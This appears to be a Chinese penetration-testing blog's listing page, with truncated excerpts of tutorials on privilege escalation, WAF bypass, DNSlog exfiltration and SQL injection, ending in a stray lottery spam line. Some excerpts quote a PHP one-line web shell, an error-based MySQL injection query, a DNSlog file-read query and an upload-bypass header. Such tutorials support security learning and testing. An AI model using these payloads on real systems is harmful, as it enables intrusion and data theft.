近期更新關于電子郵件詐騙的一些分析

mOon    滲透測試     38次查看    搶沙發    2019年06月29日

導語:一般來說,我們收到一封郵件之后,都會首先看發件人,如果是比較重要的郵件,我們可能會去看發件人地址,但是,如果發件人是偽造的,你還能知道是誰在給你發郵件么? 0x00 這是個啥? 一般來說,我們收到一封電子郵件后,都會首先看發件人,如果是比較重要的郵件,我們可能會去看一下發件人地址。但是,如果這個郵件的發件人是偽造的,你還能知道到底是誰在給你發郵件么...

如何低成本搭建dnslog服務器

mOon    滲透測試     1035次查看    搶沙發    2019年05月18日

DNSLog,簡單來說,就是通過記錄對于域名的DNS請求,通過dns請求這個相對“隱蔽”的渠道,來委婉地獲取到想要獲得的信息。 例如,在一個針對mysql數據庫的注入中,如果沒有回顯,可能很多時候就要歇菜。 但如果對方的數據庫服務器連接公網并且是Windows機器的話,就可以用這種姿勢來獲取信息: SELECT LOAD_FILE(CONCAT('\\\\',(SELECT pas...

域滲透(提權篇)

mOon    滲透測試     1157次查看    搶沙發    2019年05月11日

域滲透(提權篇) 常見信息收集 dir /a-r-d /s /b                        ...

JSONP與CORS漏洞挖掘

mOon    滲透測試     690次查看    搶沙發    2019年05月10日

前言 本文從筆者自己對同源策略的理解來談談與之相關的JSONP劫持和CORS錯誤配置這兩類安全問題。   同源策略(SOP) 同源策略限制從一個源加載的文檔或腳本與來自另一個源的資源進行交互,這是一個用于隔離潛在惡意文件的關鍵的安全機制.簡單說就是瀏覽器的一種安全策略。 “同源”包括三個條件: ...

Linux提權之SUID

mOon    滲透測試     643次查看    搶沙發    2019年05月10日

Linux提權之SUID 介紹 PATH是Linux和類Unix操作系統中的環境變量,它指定存儲可執行程序的所有bin和sbin目錄。當用戶在終端上運行任何命令時,它會通過PATH變量來響應用戶執行的命令,向shell發送請求以搜索可執行文件。超級用戶通常還具有/ sbin和/ usr / sbin條目以便于執行系統管理命令。 SUID屬性一般用在可執行文件上,當用戶執...

Metasploit框架中的Windows內核漏洞利用提權教程

mOon    滲透測試     627次查看    搶沙發    2019年05月09日

Metasploit框架中的Windows內核漏洞利用提權教程 Windows-Exploit-suggester Metasploit內置模塊提供了各種可用于提權的local exploits,并會基于架構,平臺(即運行的操作系統),會話類型和所需默認選項提供建議。這極大的節省了我們的時間,省去了我們手動搜索local exploits的麻煩。雖說如此...

繞過WAF繼續SQL注入常用方法

mOon    滲透測試     2370次查看    搶沙發    2018年12月07日

繞過WAF繼續SQL注入常用方法 Web Hacker總是生存在與WAF的不斷抗爭之中的,廠商不斷過濾,Hacker不斷繞過。WAF bypass是一個永恒的話題,不少基友也總結了很多奇技怪招。那今天我在這里做個小小的掃盲吧。先來說說WAF bypass是啥。     WAF呢,簡單說,它是一個Web應用程序防火墻,其功能呢是用于過濾某些惡意請...

利用符號繞過安全狗/D盾

mOon    滲透測試     2079次查看    搶沙發    2018年12月06日

授之以魚不如授之以漁 一句話最原始形態: <?php eval($_POST[4]);?> <?php assert($_POST[4]);?> 注意: BaiDu下一eval和assert的區別 eval可以不變量引用,而assert可以;eval可以執行多條語句,assert只能執行一句 在D狗掃描Web后門的時候就會匹配這兩個函數 繞過方法:拆封-...

上傳繞過WAF的tips大全

mOon    滲透測試     1276次查看    搶沙發    2018年12月06日

上傳繞過WAF的tips大全 原始默認狀態: ——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename=”backlion.asp” Content-Type: text/html 突破0,文件名前綴加[0x09]繞...

十種MySQL報錯注入

mOon    滲透測試     1584次查看    搶沙發    2018年11月24日

十種MySQL報錯注入 1.floor() select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); 2.extractvalue...

?
?
河北11选5开奖